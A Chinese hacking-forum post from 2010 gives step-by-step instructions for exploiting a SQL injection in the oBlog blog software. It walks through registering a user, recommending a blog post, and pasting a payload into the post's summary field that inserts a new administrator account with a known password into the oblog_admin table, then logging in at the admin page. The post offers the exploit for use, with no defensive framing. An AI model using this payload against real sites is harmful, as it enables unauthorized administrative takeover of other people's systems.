WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2230查看
  • 0回复

主题

好友

2712

积分

禁止访问

发表于 2010-2-3 16:43:32 |显示全部楼层
1、注册一个用户,用户名script,密码123456
2、发布一篇日志,日志标题:测试一下
3、个人前台首页找到日志"测试一下",点"推荐"
4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--
5、最后点"确认提交"按钮,如果提示修改成功,注入完成!
6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功!

转载请著明来源于0x54.com

pS:漏洞利用很简单~只能说程序员太疏忽了~

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-2 07:12 , Processed in 0.060185 second(s), 16 queries .

返回顶部